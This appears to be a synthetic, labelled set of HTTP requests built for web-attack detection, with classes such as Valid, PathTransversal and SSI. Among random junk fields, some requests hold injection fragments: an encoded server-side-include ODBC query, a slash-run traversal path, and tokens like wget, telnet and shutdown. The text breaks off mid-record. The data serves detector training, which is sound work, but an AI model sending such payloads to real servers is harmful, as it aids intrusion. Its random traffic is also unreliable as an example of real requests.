Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 412179
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47334
Start - Id: 662
class: Valid
GET /iei5p8cq3gVp9azed1eo/0D-66@Ri.k.aspx?eahsnaeeAr2ce=eescl&fe6=xua%25a+ie%28n%3Fnypigh+&cods2deefe4lqan=b%29t2t&txoa=fASm0Kg_O&rltihchre=2191272&hcusqYfDua=oabncee+de8metaSsu&7EpasswdF=37ie%5Ctrc&gtrawfn1h4=4818589&iern=sseRaescrTiy%5Dsopen&5bpesos=nnacm7msEonHterii&vdfuoplh=Tllc&egU4atoedg1mce=%26n-h-lsQ&oNrcplZEoJRH=lconnect+nxterm+rethd&CjYsystemnph-Sautoexec=19&44Ru35QR8t=t3higim4toau HTTP/1.0
Host: www.gzwl.biz
Connection: uabni
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.7, x-mac-chinesesimp;q=0.4, euc-kr, x-mac-arabic;q=0.0, x-mac-hebrew;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: fdf-h, 2al9l-btaNd, dttDRfoo-e2alnsk;q=0.9, ap9dlht-tfmSllem;q=0.9
Cache-Control: ohtdN=ti5
Client-ip: 82.147.177.147
Cookie: eUkotp0@-5=eaaeutj br;eei=i ezaautoexecrpoElrusrj<~tw;ihl6y8s=Efc7h;aeooonarr=u3eT3liblsuensJRU@;noo7ehrhFaureie=3280826
Cookie2: $Version="55"
Date: Sun, 22 Feb 09 11:03:56 CET
ETag: W/"1-3oBmxj2h3PWP7ZNTC8"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Tue, 22 Apr 08 17:15:44 GMT
If-Match: "LDEcsAwKT5TN6Ol6HYB"
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: ".8@ykB2.cM5LOOgCdV"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: fgrit url8arnt=mtit
Range: -7,9185-99305,64-211014
Referer: http://www.ebo0.biz/aidzTsph/vese4q/vtErnelr/okxmf.php3
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Transfer-Encoding
User-Agent: e320LF_X http://www.tssde.fr
UA-CPU: 68000
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0578x134
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: gzip
Upgrade: servnt/2.1, oxLrlm/3.0, hnae/0.5, aicd/0.5, uhtthe/3.4
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 662
Start - Id: 45255
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.rsajv.gov
Connection: keep-alive
Accept: image/*;q=0.4, image/*;q=0.6, audio/*;q=0.2
Accept-Charset: x-mac-arabic, cp-932;q=0.7, x-mac-hebrew;q=0.9, euc-cn
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 57.131.86.129
Cookie: ulEeDnnE=093;siuoer=309
Cookie2: $Version="34"
Date: Fri, 07 Jan 05 14:12:29 GMT
ETag: W/"K6FtEAzzO1@3SJ-tatG"
Expect: 100-continue
From: ysntx@c2jdcq.uk
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Sun, 11 Dec 05 22:52:37 CET
If-Match: "Szxv2LBu.1nHR-M"
If-None-Match: "EDSkN4indw7HasL1Vp3"
If-Range: *
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: i0dd qlhepevi=nmCnh
Range: -249,23568-43
Referer: http://PVQ4elr.gov/stiQu/pysy.pl
TE: trailers
Trailer: Accept
User-Agent: sEisso (aDZOalsq3)
UA-CPU: 68000
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: gzip
Upgrade: b9r/9.4
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45255
Start - Id: 40818
class: SSI
GET /eHS2fL3/Ds.9@4/qnEdDeO4DOI@@/enkHq6MI/vszf/24rwBAiQu/eiFkEPAWmTXhtSe/i_EAyGT@s/homepod81Hecho.B4D.asmx?inctl=9248693244&adPborkte=%3C%21--+++%23odbc+++++statement%3D+++%22select++1yt6%2C+++++nch6%2C++veia++from++lnesoi+++order+by+2%2C+++++95%2C+++++2%22+++++--%3E&itenscnLrve=03&fWo=4N-7I&NaTZlocationL=960271&78i5J=r2uwr&8bb=60943&holmc=%24c%2Fn&AibaEl5ceiomicu=h6f&ttiecyeoncst=hNOCgiyOoTBj&iaa=cBO-_FO&onsozoseea=dWgp&trhplN0a3nhhe5=y0ltl HTTP/1.0
Host: 197.23.112.24:80
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: euc-tw
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 245.130.209.59
Cookie: gWdtNteOmmsne4U=if2onoan;ihgeedrwoau=$8union$kt];gjs
Cookie2: $Version="9"
Date: Mon, 10 May 04 18:29:19 UTC
ETag: W/"whybu@XGd8ZnOdij9"
Expect: 100-continue
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: "vnWdg2ElyALxNX4ffCU"
If-None-Match: "bFwIfFTc_tTg-Gte-pq"
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 2733
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: hMq3ja fer7eoa4=hAawgd
Range: 8-,53016-,755940-70410
Referer: /ohtphcs/lwao/bmwtN/Arbadsd.pdf
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/4.6 (Windows; U; Win98 0.6; ue-bv; rv:0.4.1) Gecko/03909724
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 047x242
Via: FTP/1.5 www.r9isen.htm, pNdrtb/8.3 156.229.44.85
Transfer-Encoding: gzip
Upgrade: ettl/6.5, lde51/5.6, 3reeW/7.5, btaoeh/0.0, eaI83/3.5
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40818
Start - Id: 34156
class: Valid
PUT /lRZZWID/0CrhdVshZzUgLpNuEv.htm? HTTP/1.1
Content-Length: 52
Content-Language: srUbdddh,sude,e
Content-Encoding: identity
Content-Location: http://e4iOpnb.be/eoweq/5Aa1iea/ertky/gnuc.jpeg
Content-MD5: Yndybm9lbkxhc2VlZWl1aA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 11:43:50 CET
Last-Modified: Mon, 09 Feb 04 23:29:28 UTC
Host: 12.21.107.65
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.9, deflate;q=0.0, deflate;q=0.0
Accept-Language: aoed7-erm3nn;q=0.9, eektmt-ts
Cache-Control: esasl=hw
Client-ip: 112.140.17.197
Cookie: axpe7rore3ra=2
Cookie2: $Version="339"
Date: Sat, 20 Jun 09 20:27:02 GMT
ETag: W/"8BV9Vfd.rjtpLsAZ.T"
Expect: 100-continue
From: aia6le83@54sndae.st
If-Modified-Since: Mon, 23 May 05 14:44:36 UTC
If-Unmodified-Since: Sun, 08 Jul 07 05:07:59 UTC
If-Match: *
If-None-Match: "icP@LPITUg@y_LQeq-JY"
If-Range: Tue, 22 Nov 05 24:32:09 CET
Max-Forwards: 221
MIME-Version: 9.1
Pragma: tEnarimu='rsaiy4m'
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: Digest username="srua"
Range: -94,1-,-7
Referer: http://gezNm.st/kecd.wav
TE: gzip;q=0.5,trailers
Trailer: Connection
User-Agent: Mozilla/8.7 (compatible; Konqueror/1.6; Linux i386; teeme0; eztt)
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: HTTP/0.9 www.1aztebna.jpg, 6.0 107.204.115.102
Transfer-Encoding: ao3hgh
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 430 www.d0rHcli.jpeg "6n5nftt7asfttaAsoneo" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 8391965
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

rYi=rstsmE1re4ah2bbo30&aekajaovsqe=66&6ilc1ecjtn=rra

End - Id: 34156
Start - Id: 29576
class: Valid
GET /rJGXgu41@m3v33za/echoNBvarHechor/_execKUXQjsock_streamVzGkXlA/ahih19saide/F9bjagMhmlRetlyree/adhzvWYI5oB/qYxwEU8z22u/ElMQ@3P4inpiXp/5NMF2zy5.dBvlI/zao8aaehoi/eAqatnthusrg3c7t.htm? HTTP/1.1
Host: www.eoms.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: r-yps2st;q=0.5, e-tsstyes
Cache-Control: no-cache
Client-ip: 241.190.126.224
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="9"
Date: Mon, 23 Feb 04 12:31:16 CET
ETag: "MsiGfy9qc00bkKix8red"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Wed, 14 Feb 07 05:09:42 GMT
If-Unmodified-Since: Wed, 16 Feb 05 20:49:29 CET
If-Match: *
If-None-Match: "eAw1NHLVwU9v-udysPtc"
If-Range: Sat, 19 Mar 05 03:23:54 CET
Max-Forwards: 732
MIME-Version: 6.8
Pragma: itial=o
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: c1toak Canboa=bESmil
Range: 825369-97,558284-7,646196-4450
Referer: /nsoup/tahdaut1/ienxessQ/onb3uc.tiff
TE: trailers,chunked,chunked;q=0.6
Trailer: Trailer
User-Agent: ITeneeos7 (o9vB5XL.l; 4CzIZ1; r6U1OxG9)
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: HTTP/6.6 106.33.216.54
Transfer-Encoding: deflate
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29576
Start - Id: 30341
class: Valid
GET /84KLkshutdownVqGGIOxzS/cmtreO0e/lh.jpeg?fhGmizmts=gwe&sGpBrhSAoahr1=557444974&aAgt1rteszmo=c%3AudtEcEjdahLu6&2wDudFEn=10&delhcrhagdN=Ea%26tfsiAor&tetRhuagasl=atubfe&iegErlduuea=tec%24O+hissr+&sauot7s=itTnt&ss=snE%29b&iqdhwhi=07430&aoNtn=6od&fqmehtn=hpsMt&zxswao2tl=2otHei&eyelpsitoerepit=9&TGsN5t9=ee+tdergbetweens1includexhselectt HTTP/1.1
Host: 220.128.92.84
Connection: teihijeo
Accept: */*
Accept-Charset: utf-7, iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: h-w
Cache-Control: max-age=546
Client-ip: 85.188.50.79
Cookie: ontihew=haaehtur;f1nglrsNr2=ntdh  it;T-NgtelnetiB_sFa=r9xFFksD_QT;thnsudebjoiow=6aho0;rgiyombghaDolI1=2
Cookie2: $Version="894"
Date: Sat, 11 Feb 06 23:23:32 GMT
ETag: "Onk@AWNlOumbeVG4"
Expect: ehsaEtrk=7enp
From: iaanlhRg@tswhHw.st
If-Modified-Since: Wed, 19 Nov 08 14:54:34 CET
If-Unmodified-Since: Wed, 14 Mar 07 16:12:42 UTC
If-Match: *
If-None-Match: *
If-Range: "bMAYgkFPriq0IeOvZ5"
Max-Forwards: 53
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: NTLM dGFpZ2kwbW9obm5hd09sYW50ZGRpVHNndTJqb0l3cnNkc3hpdHJ0b2w=
Range: 05745-,56-61
Referer: http://www.uadia.org/h6kaeeni/taan/btIsgdee/rvtE.mspx
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/5.7 (Machintosh; U; PPC Mac OS X 1.0; cp-wt; rv:1.8.7) Gecko/08091265
UA-CPU: MIPS
UA-Disp: 011,976,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 502x9208
Via: FTP/7.7 www.ono9.jpg, FTP/1.7 www.l3sarFh.tiff:78715, 4.2 87.201.116.219
Transfer-Encoding: identity
Upgrade: tx2uo/1.4, Ooo8x/2.1
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 152.171.77.200
X-Serial-Number: 969767
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30341
Start - Id: 23855
class: Valid
GET /2DdWf7VlT3fd/Ein/ikheii/oteannzlmenes5qne/ise51ecna8UmLrs2nihn/t1kbDb5gnC.pl? HTTP/1.0
Host: 70.101.132.51
Connection: selv
Accept: video/mpeg;q=0.7
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 220.8.116.47
Cookie: ou=]pu oidiDotsncfo<g;dpgHiOs=wgetta:;txr i;ape3q7e=Ngs:sewinnt5slinknhWire;ha0=He
Cookie2: $Version="78"
Date: Thu, 04 Oct 07 06:42:06 CET
ETag: "83XztY8kM2r-EMIeO"
Expect: 100-continue
From: r0dm@twn4oe.uk
If-Modified-Since: Thu, 16 Feb 06 12:17:53 GMT
If-Unmodified-Since: Sat, 15 Apr 06 12:05:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 40
MIME-Version: 4.7
Pragma: tmoiEb='7uhtieew'
Proxy-Authorization: eItaTc son1oiny=a36ais
Authorization: Digest cnonce="w4n7b"
Range: 8717-
Referer: /lsIqn/88hr.txt
TE: chunked,deflate,trailers
Trailer: Upgrade
User-Agent: l2fosi (n-fftda; 21whDsN0; e7yFgM)
UA-CPU: MIPS
UA-Disp: 420,768,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: FTP/1.5 153.203.78.4, 7.7 186.49.21.250, 6.3 www.CTd0teb.gif
Transfer-Encoding: euat
Upgrade: tmu3/0.7
Warning: 229 172.134.147.231 "3eiaje2is" 
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23855
Start - Id: 14353
class: Valid
GET /t9aZieipijfW/WWm/pvhmordaNo/oLLiZaEBpg9wM1Al/sv3ulmi/avMqBHppk./8i/e9Pedurditrritywoahu/g0IUpswI_Im7U1/oFiQn@AGnV/0QEEkvuuKt/Qnph-SNVBina2ua.cgi?otl=mywcmgmwxeD&aesAkwle1=%40tmps0dh+c+ozhncot0aauh&ris8DxSgXf=odezUnarwlqNnrr&tres4=eOHZX7&o3scbBa=%24heu-0sevalaeEtt&drri6otv0=6JuhNwoh2+re&uinm=07TRwhS&sa7SntDiluenc=m4tzytraotw2&ruEslimajcec=1&JwinntyzZsystem.VHypE=egselectoe++&etpctou2onjYe=vaxps%3Ba%27processing-instructionafdmAlm HTTP/1.1
Host: www.nmnarkstnw.com
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: llbMti-2n
Cache-Control: only-if-cached
Client-ip: 140.179.154.56
Cookie: l9-Zfah=i yont;sa=eird;aseauiusbefthl=m
Cookie2: $Version="48"
Date: Sun, 24 Jan 10 17:10:14 UTC
ETag: "TC_z90RBLj@7d@u0A28w"
Expect: 100-continue
From: dn4yib@8dee.fr
If-Modified-Since: Wed, 21 Jan 09 01:00:30 UTC
If-Unmodified-Since: Sat, 16 Jul 05 06:13:27 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Jul 09 15:13:20 UTC
Max-Forwards: 29
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest response="516BEE4c6fF9A0a1499Ca82A523eBfea"
Range: -8,95-
Referer: /r8rn2/rkGAo4v/e9adpt64/na8epc3h/xers.txt
TE: deflate;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/8.8 (X11; U; Open BSD i386 4.9; ls-gy; rv:8.6.5) Gecko/37959513
UA-CPU: StrongARM
UA-Disp: 566,1872,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8463x313
Via: 7.3 www.tMiya7y.gif
Transfer-Encoding: deflate
Upgrade: ere/0.1, 6eI/9.1
Warning: 803 154.243.87.133 "ertPouhllghLoepDrien" "Sun, 04 Jul 04 24:56:14 CET"
X-Forwarded-For: 169.35.223.83
X-Serial-Number: 97794258051819515
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14353
Start - Id: 25274
class: Valid
GET /vDnuEize5l/h84JANSYuXc5HF9TUUN/sblTpdzOS0fwyjF/tANlJvx58FG-0M/ysS5WyrEauoQ.tiff?hshuktn=d7e0&thohrrnKFx1lcEn=nmHsTS&ii7s=uestboiel&eitehxlmreuNs=n+ta&prsxr=l3anfduaaN&eh.rm2V=ntY&9.sock_streamOOrZP8lib=39157 HTTP/1.0
Host: www.u7Qt9wreae.it:5
Connection: keep-alive
Accept: application/*, image/*;q=0.3
Accept-Charset: hz-gb-2312;q=0.8
Accept-Encoding: 
Accept-Language: onyol2-n4oetsmc, bCneqdr7-ieo;q=0.1, z-e, te-ea;q=0.3
Cache-Control: no-transform
Client-ip: 171.125.43.47
Cookie: c0Eei2ciecWeca=anWFaQzqUv
Cookie2: $Version="129"
Date: Fri, 06 Aug 04 02:39:04 GMT
ETag: "yXA.9.BUvI8gCRhW6O"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Sun, 12 Apr 09 09:11:18 CET
If-Unmodified-Since: Mon, 20 Apr 09 20:29:20 GMT
If-Match: *
If-None-Match: "NEVjZbt5HXMbjSov"
If-Range: Thu, 24 Sep 09 14:42:00 CET
Max-Forwards: 555
MIME-Version: 4.0
Pragma: Loe=5S
Proxy-Authorization: NTLM MnlGZmZyc2xzZTluY2U3eW5pdGRsbmNvdWFFdzQyb2VvZW91QW50cGd5
Authorization: Digest response="fe58E2ff7C5fB02822635c5481Dcfa37"
Range: 04-39299,179937-1471,76-
Referer: /is5tt/lsaUtgd/yrsnqeA/dcjsml/piews.pdf
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 9.1; s8-fs; rv:5.3.1) Gecko/36153045
UA-CPU: x86
UA-Disp: 8204,1865,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4028x8502
Via: mpde/5.0 231.99.80.202, 0.2 161.226.92.70, FTP/3.4 www.pkm4weae.jpeg
Transfer-Encoding: gzip
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25274
Start - Id: 6736
class: Valid
PUT /3r5/casrms/uRl@KziframeshutdownT3/nKK_XMAnKsg-d/jranN/imieOR/iteIeTesgtofobenvat/hAL@A/nWRP/tAu6/z.k1_OwnRq3FrLfg/NwDtbiframe.R4S4.shtml? HTTP/1.0
Content-Length: 40
Content-Language: easrnnr,u2Meeli
Content-Encoding: gzip
Content-Location: /sloSrdsc/97ted/4Bgcbit/oLNA.js
Content-MD5: c1Jzb3NlZnB4MnJUaTd0eA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 May 09 16:27:25 GMT
Last-Modified: Tue, 16 Mar 10 23:47:59 CET
Host: 135.181.172.39
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i, x-mac-turkish, euc-cn;q=0.3, windows-1258, x-mac-arabic;q=0.0
Accept-Encoding: 
Accept-Language: 0a9-taty9
Cache-Control: no-cache
Client-ip: 69.97.95.198
Cookie: inttbrrm=6
Cookie2: $Version="87"
Date: Thu, 10 Sep 09 04:51:50 GMT
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: hete
From: yhiii@asou.ch
If-Modified-Since: Fri, 13 Jun 08 08:49:01 GMT
If-Unmodified-Since: Thu, 28 Apr 05 24:37:13 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Apr 04 22:45:33 UTC
Max-Forwards: 9761
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWV1aWtvMGJsZmkxdWVpbGNkbnNzZHhwaGRydHFyaHJzbmNlb2FuaW5qSHJoYXI=
Authorization: Digest realm
Range: -857816
Referer: http://www.Eid5.st/mnhoqtx/atAtca.jpeg
TE: deflate,trailers
Trailer: Referer
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 9.6; en-pN; rv:2.8.5) Gecko/63747914
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 133x848
Via: wP7aUP/8.5 121.89.138.41, HTTP/9.4 www.riMThMmn.js, j5e/9.6 140.159.55.76
Transfer-Encoding: compress
Upgrade: uEWpe7/8.0, areh/1.5, 0udeep/0.1
Warning: 366 171.36.127.196 "totegellhyswl3loi" 
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 0215264637366024
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~

7nzytreo=o&ectteedt5ed=oaxeeeuiOcmdrpMgo

End - Id: 6736
Start - Id: 1102
class: Valid
GET /euUdNo4xsBynjiJaqrjG/zrcxiRHlT6.XOnw9.html?8perlr0V=386&Eknyebmmqrrmy=0dnodey&sd=8453349468&lHaouAfg=gxn&hY2TJ=%25tmhtio%2FannA62d&e0poa2t=orY4k_IrZait&NBneesea=ird8_M6&RqdocumentFNT=geWoig5pBcdeL5rsrc&otcE1eqjdasim=+7Staon%3AhdhttpssidDh&cs4ssehatrTga=zasconnectmochaj%25%24aeh%3Eimrnol HTTP/1.1
Host: 46.104.19.43
Connection: close
Accept: application/zip;q=0.5, image/png;q=0.6, video/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: a8-OrnDclat, lesLwg-hmeemor, ayee-dmGrEeL, s-f, anms-inger6
Cache-Control: max-age=1
Client-ip: 249.26.84.16
Cookie: wbnasntrRro=0;Deb=48968395;fireajthhtIg=DorA;s3koatehoU=47034;tmttfld7a=7znuy7aN1Deaaei
Cookie2: $Version="48"
Date: Sat, 21 Feb 09 08:13:17 CET
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 24 Jul 05 20:42:46 CET
If-Unmodified-Since: Mon, 15 Oct 07 07:05:34 GMT
If-Match: "aDcV4HzyhcFyo9g1"
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 9.9
Pragma: o=r
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest username="esc6"
Range: 634551-,48052-6687,-9
Referer: http://st5tnryc.uk/eaossipm/dalta.mpeg
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Necnm0r/3.7.7.9.0
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: deflate
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 392 www.m2hZnz.tiff "idliSa9nioaswwetlp" "Thu, 02 Sep 04 23:56:20 CET"
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1102
Start - Id: 29386
class: Valid
GET /mMqorWl-e4.hcX4.EI/ht40mm3nyssnltoAet1h/cPLpQlkFqQcH1xvo8I-B/tl/qrvOkKI0jlP./jDkvTdZHGw/nhRtXQ2/oJZzvAd9sMLy0M2n/9c/dEYMulkaucE7hKbeDli/nTF6WQ-6xJe.shtml?fFr4=45528167&ersel=3362&I9e6v=v%3Dri2eoe%7E&TrEct=a%3D&fhminnwtomtPco=si4h&GWrkHe=frcws&tangeeV=3&anse=4ndhaeafiattehe6n HTTP/1.0
Host: www.yekaypl.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-1, shift_jis, x-mac-icelandic, gb2312;q=0.9, x-mac-arabic
Accept-Encoding: gzip;q=0.1, deflate;q=0.2, identity;q=0.5
Accept-Language: eieEehaY-sidotg;q=0.6, 6ioehifg-c7evoi, 6Mqc-ecdeo5p, piu-od3, nwti-mL
Cache-Control: min-fresh=66225
Client-ip: 117.25.130.47
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="907"
Date: Wed, 02 Jun 04 16:15:56 CET
ETag: W/"KXncEj1y55DXQgZ3NAOE"
Expect: eascesxn=TdAslls
From: osNmtbzi@essattenoe.ch
If-Modified-Since: Fri, 03 Dec 04 01:53:23 UTC
If-Unmodified-Since: Thu, 25 Oct 07 11:39:36 UTC
If-Match: "vm8S4fyokABGjVA"
If-None-Match: *
If-Range: "frLRXIvDy.1o5xzM"
Max-Forwards: 1
MIME-Version: 2.7
Pragma: aixi='va6ep'
Proxy-Authorization: NTLM c2hUY2RhY2FhYW9zM2lnb244ZW9leWNyOThOb2ZobjlpdVNzc3RpdHNk
Authorization: Basic ZDRzczpzYmNl
Range: 60-931,-49,8-736
Referer: http://www.Ovhyt.uk/o2217Gm.zip
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 5.3; ai-nl; rv:3.1.5) Gecko/35700340
UA-CPU: MIPS
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1934x9864
Via: 9.6 www.eniap.jpeg, 8.7 www.sdz2QxRc.gif:041, HTTP/7.6 46.103.38.123
Transfer-Encoding: compress
Upgrade: ntq/7.1, sstu/6.4, uCn/0.4, ane/7.2
Warning: 048 33.183.216.46 "9yhdr3tnxj3u" 
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29386
Start - Id: 5708
class: Valid
PUT /oA/rvN02J/Amdh/.GVIW@7Lh/ln/c.6n3jGd9kiFVdN/4BO/ttsp/jor/nG1o.I-A3pq5JvKt2DKG/O6likeetc.cfm? HTTP/1.1
Content-Length: 43
Content-Language: ab,hO,rane7gt
Content-Encoding: identity
Content-Location: /wa0yuj/9onp8d4.jsp
Content-MD5: cHFhZG90c2V1MndnNGVlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Jul 09 13:27:00 UTC
Last-Modified: Tue, 16 Jan 07 17:27:18 GMT
Host: 231.147.51.151
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=2
Client-ip: 110.24.246.81
Cookie: teNthagyl61y=14892;iiesmod=oeeietse;nabas=dItesb8aegh
Cookie2: $Version="819"
Date: Mon, 20 Nov 06 20:12:11 GMT
ETag: "VVGNW8zSXxQI4.C1N"
Expect: 100-continue
From: ototLn2u@5heey.uk
If-Modified-Since: Fri, 24 Apr 09 04:11:51 CET
If-Unmodified-Since: Wed, 31 Oct 07 11:16:39 GMT
If-Match: *
If-None-Match: "Qoq1w6_UNGcl20zu"
If-Range: "OXMZ@iYE2nT47yi5"
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest response="EF4ECf02FCB0B3A3dBCfC57Ba47ABc57"
Authorization: wiea txirssN=niea1e
Range: 40090-
Referer: /3telpr/le5O.avi
TE: trailers
Trailer: Cache-Control
User-Agent: chrwg/7.8.7.8.4
UA-CPU: MIPS
